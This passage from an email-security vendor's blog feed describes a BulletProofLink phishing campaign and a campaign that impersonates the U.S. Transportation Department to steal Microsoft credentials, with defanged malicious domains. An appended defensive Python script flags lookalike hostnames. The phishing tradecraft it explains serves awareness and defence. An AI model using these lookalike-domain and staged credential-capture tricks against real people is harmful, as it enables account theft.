(Source: Microsoft)</figcaption></figure><p> </p> <p><span><span>If clicked, the campaign redirected the recipient to an attacker-owned site that subsequently sent them to another site hosting the phishing page. That location contained a fake Outlook sign-in form. With the help of user-specific URLs and other tactics, the page stole the victim’s details.</span></span></p> <h2><span><span><span><span><span>How to Defend Against BulletProofLink-Enabled Campaigns</span></span></span></span></span></h2> <p><span><span>PhaaS operations such as BulletProofLink highlight the need for organizations to strengthen their email security posture. One of the ways that organizations can do that is by investing in an email security solution that’s capable of looking at multiple elements of an incoming email message such as campaign patterns, malicious IP addresses, and malware signatures. Such a tool should operate in real time so that regular business correspondence is unimpeded.</span></span></p> <p><span><span><a href="/products/email-threat-protection" rel="nofollow">Defend against the rise of PhaaS groups like BulletProofLink with Ƶɫ | AppRiver</a>.</span></span></p> Tue, 12 Oct 2021 19:57:10 +0000 admin 471 at Phishers Impersonate U.S. Transportation Department to Steal Victims’ Microsoft Credentials /resources/blog/october-2021/phishers-impersonate-us-transportation-department-steal-victims <span>Phishers Impersonate U.S. 
Transportation Department to Steal Victims’ Microsoft Credentials</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Thu, 10/07/2021 - 14:07</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2021-10/transportation_image.jpg" width="1400" height="700" alt="" loading="lazy" typeof="foaf:Image" /></article><p><span><span>Digital attackers launched a phishing campaign in which they impersonated the U.S. Department of Transportation (USDOT) to steal victims’ Microsoft credentials.</span></span></p> <h2><span><span><span><span><span>An Attack Full of Attempts at Legitimacy</span></span></span></span></span></h2> <p><span><span>Covered by <a href="https://www.nytimes.com/2021/08/10/us/politics/infrastructure-bill-passes.html" rel="nofollow">ZDNet</a>, the phishing campaign came just a few weeks after the U.S. Senate passed a <a href="https://www.nytimes.com/2021/08/10/us/politics/infrastructure-bill-passes.html" rel="nofollow">$1 trillion infrastructure bill</a> in mid-August.</span></span></p> <p><span><span>Those responsible for this operation tried to use that timing to their advantage. They started by registering the lookalike domain transportationgov[.]net to send their phishing emails from. (The actual domain for USDOT is transportation.gov.) 
The attackers registered the domain through Amazon on August 16, just before the campaign began.</span></span></p> <p><span><span>In the attack emails themselves, the malicious actors informed a recipient that USDOT was inviting them to submit a bid for a department project by clicking a hyperlinked button that read, “CLICK HERE TO BID.”</span></span></p> <p><span><span>In the event a recipient complied and clicked the button, they found themselves redirected to the website transportation.gov.bidprocure.secure.akjackpot[.]com. The attackers no doubt crafted this hostname so that the visitor would see “transportation.gov” and assume they were safe. But transportation.gov isn’t the registrable domain here; akjackpot[.]com is, and whoever controls that domain can put any labels they like in front of it, “transportation.gov” included. That domain has never had anything to do with USDOT: someone first registered it in 2019, and it appears to have hosted the website of an online casino catering to Malaysians for some period. </span></span></p> <p><span><span>It’s unclear whether those who first registered akjackpot[.]com were responsible for this attack or whether the phishers compromised the domain.</span></span></p> <p><span><span>Either way, the attackers used the site to display the following instructions: “Click on the BID button and sign in with your email provider to connect to the network.” Assuming the visitor did, the campaign then presented them with a website that replicated the HTML and CSS copied from USDOT’s official site. The website came with a “CLICK HERE TO BID” button that, if clicked, displayed a dialog box designed to steal the visitor’s Microsoft credentials.</span></span></p> <p><span><span>When the visitor first attempted to submit their credentials, the campaign presented them with a reCAPTCHA challenge while it secretly exfiltrated their details to the phishers. 
It displayed a fake error message on the second attempt before redirecting the visitor to the real USDOT site, thus giving attackers some time to assume control of their victim’s account and/or to monetize the stolen credentials on the dark web.</span></span></p> <h2><span><span><span><span><span>Defending Against Email Attacks Impersonating USDOT</span></span></span></span></span></h2> <p><span><span>The campaign discussed above highlights the need for organizations to defend themselves against email attacks impersonating U.S. government entities like USDOT. One of the ways they can do that is by updating their security awareness training programs to take deceptive phishing attacks into account. For instance, they can focus on educating their workforce that official U.S. government websites end in .gov or .mil, not .net or .com. They can also emphasize the reality that governmental organizations such as USDOT rarely send out “cold emails” where they directly invite recipients to submit bids for work. Finally, they can round off that education by explaining why lookalike domains such as transportationgov[.]net deserve suspicion, and why a prompt to sign in to a web service like Microsoft 365 in order to view a document is a red flag.</span></span></p> <p><span><span>Simultaneously, organizations need to balance those human controls with multiple layers of technical controls. Those security measures include multi-factor authentication (MFA), which limits what a stolen password alone is worth, and single sign-on (SSO). 
They also include the use of an email security solution that’s capable of scanning incoming messages for campaign patterns and other threat indicators in real time, thus allowing legitimate correspondence to reach its intended destination.</span></span></p> <p><span><span><a href="/products/email-threat-protection" rel="nofollow">Defend against impersonation email attacks using Ƶɫ | AppRiver</a>.</span></span></p> Thu, 07 Oct 2021 19:07:52 +0000 admin 464 at
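Two of the posts above turn on the same trick: a brand name placed in a hostname whose registrable domain is not the brand’s. The Maersk post has noreply@maersklineshipping[dot]com standing in for @maersk.com; the USDOT post has transportationgov[.]net and transportation.gov.bidprocure.secure.akjackpot[.]com standing in for transportation.gov. The following added example, not code from the original posts or from Ƶɫ | AppRiver, refangs an indicator, works out its registrable domain, and flags both shapes, plus the generic case of a public suffix such as “gov” appearing as a subdomain label. The small PUBLIC_SUFFIXES set is an assumed stand-in for the Public Suffix List and BRAND_DOMAINS is an assumed allowlist; both would be replaced with real data in use.

```python
"""Flag sender addresses and URLs that carry a brand name in the hostname while the
registrable domain belongs to someone else. Covers the lookalike registrations
maersklineshipping.com / transportationgov.net and the subdomain trick
transportation.gov.bidprocure.secure.akjackpot.com from the posts above."""
from __future__ import annotations

from urllib.parse import urlsplit

# Assumption: a tiny stand-in for the Public Suffix List, enough for the indicators
# in these posts. Production code should use the real list (e.g. the tldextract or
# publicsuffix2 packages); it is what makes multi-label suffixes like go.th resolve.
PUBLIC_SUFFIXES = {"com", "net", "org", "gov", "mil", "co.uk", "go.th", "com.my"}

# Brand token -> the registrable domains that brand genuinely uses. maersk.com and
# transportation.gov come from the posts; docusign.net is the sender domain of the
# real DocuSign notification described in the DocuSign post. Assumed allowlist.
BRAND_DOMAINS = {
    "maersk": {"maersk.com"},
    "transportation": {"transportation.gov"},
    "docusign": {"docusign.com", "docusign.net"},
}


def refang(indicator: str) -> str:
    """Undo report-style defanging so the indicator can be parsed."""
    return indicator.replace("[.]", ".").replace("[dot]", ".").replace("hxxp", "http")


def hostname_of(indicator: str) -> str:
    """Accept an email address, a bare hostname or a URL; return the lower-cased host."""
    s = refang(indicator.strip()).lower()
    if "@" in s and "://" not in s:
        return s.rsplit("@", 1)[1]
    if "://" not in s:
        s = "http://" + s
    return urlsplit(s).hostname or ""


def registrable_domain(host: str) -> str:
    """Return the registrable domain (eTLD+1) of host, trying the longest suffix first."""
    labels = host.split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return host if i == 0 else ".".join(labels[i - 1:])
    return ".".join(labels[-2:])  # unknown suffix: fall back to the last two labels


def check_indicator(indicator: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing looked off."""
    host = hostname_of(indicator)
    reg = registrable_domain(host)
    findings: list[str] = []
    for brand, legit in BRAND_DOMAINS.items():
        if reg in legit:
            continue  # genuinely the brand's domain, e.g. dse_NA4@docusign.net
        if any(brand in label for label in host.split(".")):
            msg = (f"{host}: '{brand}' appears in the hostname but the registrable "
                   f"domain is {reg}, not one of {sorted(legit)}")
            if any(d.endswith((".gov", ".mil")) for d in legit) and not reg.endswith((".gov", ".mil")):
                msg += " (U.S. government sites end in .gov or .mil)"
            findings.append(msg)
    # Independent of any brand list: a public suffix used as a *subdomain* label
    # ("transportation.gov." in front of akjackpot.com) is a strong lookalike signal.
    sub_labels = host[: -len(reg) - 1].split(".") if host != reg and host.endswith(reg) else []
    fake_suffixes = [l for l in sub_labels if l in PUBLIC_SUFFIXES]
    if fake_suffixes:
        findings.append(f"{host}: public suffix label(s) {fake_suffixes} used as subdomains of {reg}")
    return findings


if __name__ == "__main__":
    for ioc in ("noreply@maersklineshipping[dot]com",
                "transportation.gov.bidprocure.secure.akjackpot[.]com",
                "transportationgov[.]net", "dse_NA4@docusign.net", "https://www.maersk.com/"):
        print(ioc, "->", check_indicator(ioc) or ["ok"])
```

Run stand-alone it prints one line per indicator. In a mail-flow hook the same check runs over the From: domain and every hyperlink host in the body; the brand allowlist is the part that needs maintaining, which is why the public-suffix-as-subdomain rule, which needs no allowlist, is worth keeping even on its own.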